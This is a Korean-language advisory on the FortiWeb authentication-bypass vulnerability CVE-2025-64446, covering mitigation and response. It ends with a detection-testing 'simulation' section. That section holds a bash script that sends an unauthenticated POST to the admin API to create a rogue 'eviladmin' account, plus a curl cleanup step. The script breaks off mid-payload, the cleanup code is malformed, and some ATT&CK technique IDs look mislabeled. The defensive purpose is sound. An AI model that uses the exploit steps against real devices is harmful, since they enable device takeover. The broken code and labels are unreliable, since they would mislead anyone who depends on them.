Fortinet FortiWeb 인증 우회 경로 탐색 취약점 (CVE-2025-64446)

요약

Fortinet FortiWeb에서 발견된 새로운 인증 우회 취약점 CVE-2025-64446은 경로 탐색 요청을 통해 인증되지 않은 공격자가 관리자 계정을 생성할 수 있게 합니다. 공개된 보고서에 따르면, 이 취약점은 2025년 10월 초부터 적극적으로 악용되었으며, 그 심각성 때문에 공식적인 위협 카탈로그에 추가되었습니다. 성공적인 익스플로잇은 영향을 받은 WAF 장치를 완전히 제어할 수 있게 하며, 위협 행위자가 더 깊은 내부 네트워크로 접근할 수 있게 합니다. 초기 CVE-2025-64446 조사에 의하면, 익스플로잇 시도가 인터넷에 노출된 FortiWeb 장치를 목표로 계속 진행되고 있습니다.

CVE-2025-64446 분석

CVE-2025-64446은 여러 FortiWeb 버전에 영향을 미치며, 공격자가 API 엔드포인트로 악의적인 HTTP POST 요청을 보낼 수 있게 합니다. 디렉토리 탐색 시퀀스는 사용자 생성에 책임이 있는 관리 CGI 스크립트에 접근을 허용합니다. 이는 장치에 새로운 관리자 계정을 생성하게 하여 완전한 적대적 제어를 허용합니다. FortiWeb 장치는 다른 Fortinet 제품과 가까이 운영되기 때문에, 이 취약점은 더 넓은 생태계 노출을 가져옵니다. 성공적인 침입은 공격자가 수평 이동할 수 있게 하며, 추가로 연결된 시스템과 서비스를 손상시킬 수 있습니다. 이전에 관찰된 FortiWeb에 대한 공격(CVE-2025-25257과 관련된 활동 포함)이 계속적으로 목표가 될 가능성을 강화합니다.

완화

Fortinet은 모든 영향을 받는 버전에 대한 패치를 발표했습니다. 즉각적인 CVE-2025-64446 완화는 최신 수정 릴리스 제품 버전 8.0.2로 업그레이드해야 합니다. 권장 완화 조치에는 신뢰할 수 있는 IP 주소 또는 VPN에 대한 관리 인터페이스 접속 제한, 관리 접근에 대한 MFA 강제 시행, 모든 FortiWeb 관리자 계정에 대한 자격 증명 변경, 비정상적인 사용자 생성 이벤트에 대한 관리자 API 활동 모니터링, 그리고 공용 인터넷에서 HTTP/HTTPS 관리 노출 제거가 포함됩니다. 조직은 또한 내부 패치 테스트 절차를 따라 운영 중단을 방지해야 합니다.

응답

보안 팀은 버전 인벤토리를 확인하고, 지체 없이 패치를 적용하며, 즉시 업그레이드할 수 없는 경우 외부 관리 액세스를 비활성화해야 합니다. 활성 악용 시도를 고려할 때 취약한 API 경로를 목표로 하는 의심스러운 POST 요청에 대한 모니터링을 강화하는 것이 좋습니다. 기존 계정에 예상치 못한 변경 사항이 나타나면 자격 증명을 변경하고 감사 로그를 더 자주 검토해야 합니다. CVE-2025-64446 IOCs를 수집하고, 트래픽 패턴을 검토하며, 최근 익스플로잇 활동과의 상관 관계를 확인하면 가시성이 향상되고 위험이 줄어듭니다.

시뮬레이션 실행

전제 조건: 텔레메트리 및 기준선 프리-플라이트 체크가 통과해야 함.

이유: 이 섹션은 탐지 규칙을 유발하기 위해 고안된 적대적 기술(TTP)의 정확한 실행을 자세히 설명합니다. 명령어와 서술은 반드시 식별된 TTP를 직접 반영하여, 탐지 논리에 의해 기대되는 정확한 텔레메트리를 생성해야 합니다.

• • 공격 서술 및 명령어:

    1. 정찰 (T1016.001): 공격자는 오픈 소스 정보를 통해 FortiWeb 장치의 공개된 IP를 발견합니다.
    2. 자격 증명 수집 / 권한 상승 (T1567.004): 공격자는 발견된 CVE-2025-64446을 사용하여 전체 권한이 부여된 새로운 관리 사용자를 만드는 악의적인 POST 페이로드를 작성합니다.
    3. 실행: 공격자는 HTTPS를 통해 제작된 요청을 보내고, request_method 는 POST 이며 request_uri 는 /api/v2.0/cmdb/system/admin.

  • 회귀 테스트 스크립트:

    #!/usr/bin/env bash
    # CVE-2025-64446을 이용하여 새로운 FortiWeb 관리자 계정 생성
    # 목표 환경에 맞게 변수를 조정하세요
    
    TARGET="https://fortiweb.example.com"
    ENDPOINT="/api/v2.0/cmdb/system/admin"
    NEW_USER="eviladmin"
    NEW_PASS="P@ssw0rd!2025"
    # 이 취약점에는 해당 엔드포인트에 대한 인증이 필요하지 않습니다 (CVE에 따라)
    PAYLOAD=$(cat <

• 정리 명령어:

  #!/usr/bin/env bash
  # 테스트 중 생성된 악의적인 관리자 계정 삭제
  TARGET="https://fortiweb.example.com"
  ENDPOINT="/api/v2.0/cmdb/system/admin/${NEW_USER}"
  
  echo "[*] 테스트 관리자 계정 ${NEW_USER} 삭제 중"
  curl -k -X DELETE "${TARGET}${ENDPOINT}" 
       -H "Content-Type: application/json" 
       -o /dev/null -s -w "HTTP %{http_code}n"
  
  echo "[*] 정리 완료."